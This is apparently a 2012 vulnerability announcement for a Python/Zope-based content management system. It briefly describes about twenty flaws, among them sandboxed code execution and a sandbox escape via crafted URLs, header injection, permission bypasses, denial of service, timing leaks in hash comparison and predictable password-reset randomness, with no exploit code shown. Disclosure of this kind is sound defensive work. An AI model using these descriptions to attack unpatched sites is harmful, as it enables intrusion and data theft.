Security vulnerability announcement: 20121106 - Multiple vectors
Anonymous users can cause an arbitrary Python statement to be run when the admin interface is accessed. No breakout of the in-built Python sandbox is possible, but it will run with the privileges of that admin user.
A crafted URL can contain arbitrary HTTP headers that are then returned to the user. Can be used to log users out, for example.
Accidental exposure of the sandbox whitelisting function when imported from a certain, nonstandard location.
Crafted URL allows arbitrary (sandboxed) Python to be run.
Incomplete security declarations on certain objects allow permission checking to be bypassed on some functions.
Crafted URL allows a passed full response body (or a redirect target) to be returned by accidental exposure of internal methods of the response file handle on a URL.
Can be used to access a subset of attributes of unpublished content items through a crafted URL, if that content's path is known
Escape from sandbox through a utility function not checking that it has valid inputs, allowing access to the trusted builtins
Utility function is callable directly through a crafted URL and accepts a default value.
Crafted URL allows arbitrary (sandboxed) Python to be run
A method of the membership database is insufficiently protected, allowing users who do not have permission to enumerate users to do so through a crafted URL
This DoS causes large amounts of IO and cache churn, meaning it can be used to DoS a site if accessed repeatedly
DoS through exposed utility function
The batch id change script does not correctly handle anonymous users attempting to change titles but leaving the ids the same correctly. Allows anonymous users to craft a POST request (once they've found a valid CSRF token) to change content titles arbitrarily.
BLOBs stored on custom content types can be accessed through a non-standard URL, bypassing the declared permission check
Users can read the contents of folders (but not access the files themselves) that they would otherwise be unable to access.
Crafted URLs allow arbitrary strings (including full HTML) to be stored in memory against a key, that can then be read out again on a related URL.
Some types of URL can be ambiguous, the unambiguous form allows anonymous views. On some content types an anonymous view lookup returns a private data structure, which under certain circumstances may be used to read out confidential data.
A specially crafted URL invoking the RSS feed for a folder the user doesn't have access to (but knows the path of) can cause an infinite loop, trying up a server thread.
The equality test in our authentication system is not constant time, allowing a user with a sufficiently stable, fast connection to the server to check hash prefixes
We are using a Python random (seeded via system random), not system random, which in a long running process means it isn't reseeded. In addition, our error pages leak random numbers, allowing the state of the PRNG used for password resets to be derived.
A vulnerability in z3c.form that leaks default values of form fields through crafted URLs.